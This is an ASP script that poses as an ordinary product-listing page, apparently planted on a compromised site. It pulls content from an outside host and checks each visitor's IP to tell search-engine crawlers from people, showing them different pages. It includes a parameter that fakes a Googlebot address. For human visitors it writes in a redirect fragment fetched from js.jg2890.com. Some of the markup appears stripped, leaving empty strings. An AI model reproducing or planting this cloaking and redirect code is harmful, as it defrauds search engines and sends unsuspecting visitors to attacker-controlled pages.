<% function getHTTPPage(url) dim Http set Http=server.createobject("MSXML2.XMLHTTP") Http.open "GET",url,false On Error Resume Next Http.Send() If Http.Status<>200 then exit function end if getHTTPPage=bytesToBSTR(Http.responseBody,"UTF-8") set http=nothing if err.number<>0 then err.Clear end function Function BytesToBstr(body,Cset) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function Dim Url,Html yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now) if request("id")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/NY_Tou.aspx?s_id=21&rnd="&yyu&"&p_id="&request("id") else if request("pageIndex")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?s_id=21&rnd="&yyu&"&pageIndex="&request("pageIndex")&"" else if request("searcher")<>"" then URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?s_id=21&rnd="&yyu&"&searcher="&request("searcher")&"" else URL="http://hjg7.jg2890.com/product_color_zd/LB_Tou.aspx?rnd="&yyu&"&s_id=21" end if end if end if Html = getHTTPPage(Url) if request("kk")<>"" then ip="66.249.64.190" else ip=Request.ServerVariables("REMOTE_ADDR") end if ipurl="http://hjg7.jg2890.com/getdomain.aspx?rnd=1&ip="&ip domain =getHTTPPage(ipurl) if (instr(domain,"google")>0 or instr(domain,"msn.com")>0 or instr(domain,"yahoo.com")>0 or instr(domain,"aol.com")>0) then set re = new RegExp re.IgnoreCase =True re.Global = True re.Pattern = "]*?>([\s\S]*?)" Set matchs = re.Execute(html) for each match in matchs sc= match.SubMatches(0) next set matchs = nothing Html=replace(Html,"","") Response.write Html else Response.write Html if request("id")<>"" then ccc=request("id") ccc=replace(ccc," ","-") ccc=replace(ccc,"--","-") ddd=getHTTPPage("http://js.jg2890.com/scn-en-2018.txt?id=1") eee=ddd&ccc&".html'}" eee=replace(eee,"--","-") Response.write "" else if request("searcher")<>"" then ccc=request("searcher") ccc=replace(ccc," ","-") ccc=replace(ccc,"--","-") ddd=getHTTPPage("http://js.jg2890.com/scn-en-2018.txt?id=1") eee=ddd&ccc&".html'}" eee=replace(eee,"--","-") Response.write "" else ddd=getHTTPPage("http://js.jg2890.com/scn-en-2018.txt?id=1") eee=ddd&".html'}" eee=replace(eee,"--","-") Response.write "" end if end if end if %>
<% Dim Urlyy,Htmlyy yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now) if request("searcher")<>"" then URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=21&rnd="&yyu&"&searcher="&request("searcher")&"" else if request("pageIndex")<>"" then URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=21&rnd="&yyu&"&pageIndex="&request("pageIndex")&"" else URLyy="http://hjg7.jg2890.com/product_color_zd/LB_NR.aspx?s_id=21&rnd="&yyu&"" if request("id")<>"" then Urlyy="http://hjg7.jg2890.com/product_color_zd/NY_Content.aspx?s_id=21&rnd="&yyu&"&p_id="&request("id") end if end if end if Htmlyy = getHTTPPage(Urlyy) Htmlyy=replace(Htmlyy,"LB_NR.aspx","jazzos.asp") Htmlyy=replace(Htmlyy,"s_id=21&rnd="&yyu&"&","") Htmlyy=replace(Htmlyy,"?p_id=","?id=") Response.write Htmlyy %>
Copyright © 2018 All rights reserved.